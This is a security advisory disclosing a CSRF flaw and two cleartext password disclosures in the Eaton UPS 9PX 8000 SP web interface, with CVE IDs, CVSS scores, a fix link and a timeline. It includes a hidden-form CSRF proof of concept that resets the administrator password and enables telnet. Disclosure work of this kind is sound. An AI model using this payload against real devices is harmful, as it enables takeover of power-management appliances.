Bishop Fox Security Advisory: Multiple Security Vulnerabilities Discovered in Eaton UPS 9PX 8000 SP
The following document describes identified vulnerabilities in the EATON UPS 9PX 8000 SP device, a power management appliance, which protects IT devices connected to it from the effects of electrical blackouts.
The Eaton power management appliance is manufactured by Eaton Corporation. This equipment uses a web interface to allow administrators to configure it. This web interface is where the vulnerabilities were discovered.
Multiple vulnerabilities were identified within the EATON UPS 9PX 8000 SP web application:
- One instance of cross-site request forgery
- Two instances of password disclosure
These vulnerabilities are described in the following sections.
UPS 9PX 8000 SP
Eaton Corporation closed out the foregoing vulnerabilities by developing and validating firmware that addresses the noted risks. The fix can be found at the following website: https://powerquality.eaton.com/support/software-drivers/downloads/connectivity-firmware.asp
The Eaton web application is affected by one cross-site request forgery (CSRF) vulnerability. This CSRF bug requires user interaction to be executed.
CVE ID: CVE-2018-9281
Access Vector: Remote
Security Risk: High
CVSS Base Score: 8.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
The administration panel is vulnerable to CSRF attacks in the change password functionality. The vulnerability could be used to force a logged-in administrator to perform a silent password update.
This issue can be triggered by redirecting an administrator who is logged into the Eaton application to a malicious web page.
The code snippet below can be used to exploit this vulnerability:
447. <title>CSRF Eaton</title>
452. <iframe style="display:none" name="csrf-frame"></iframe>
453. <form id="csrf-form" action="http://HOST/Forms/ups_cont_1" method="POST" target="csrf-frame" >
454. <input type="hidden" name="ManagerLogin" value="admin" >
455. <input type="hidden" name="NewPassword" value="MyPassword" >
456. <input type="hidden" name="ConfirmPassword" value="MyPassword" >
457. <input type="hidden" name="AuthExternal" value="1" >
458. <input type="hidden" name="SecurityMode" value="1" >
459. <input type="hidden" name="TelnetAccess" value="on" >
460. <input type="hidden" name="ConsoleInterface" value="1" >
461. <input type="hidden" name="Submit" value=" Save " >
466. <iframe style="display:none" name="csrf-frame2"></iframe>
The Eaton web application is affected by a password disclosure vulnerability. The Eaton appliance discloses user passwords in two ways, which are described below. To exploit the vulnerability, a malicious user needs to be authenticated to the web application and browse to the affected pages.
CVE ID: CVE-2018-9279 and CVE-2018-9280
Access Vector: Remote
Security Risk: Medium
CVSS Base Score: 4.9
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
User Password Disclosure (CVE-2018-9279)
The web page displayed by the appliance stores user passwords in cleartext. Passwords could be retrieved by browsing the source code of the web page, as shown in the figure below:
SNMP version 3 Password Disclosure (CVE-2018-9280)
The Eaton appliance discloses the SNMP version 3 user’s password as well. The web page displayed by the appliance contains the password in cleartext.
Passwords of read/write users could be retrieved by browsing the source code of the web page, as shown in the figure below:
- 3/1/2018: Initial discovery
- 7/2/2018: Contact with vendor
- 10/15/2018: Solution released by vendor
- 10/19/2018: Public disclosure of vulnerabilities
Florian Nivette, Managing Security Associate at Bishop Fox
Kelly Albrink, Security Analyst at Bishop Fox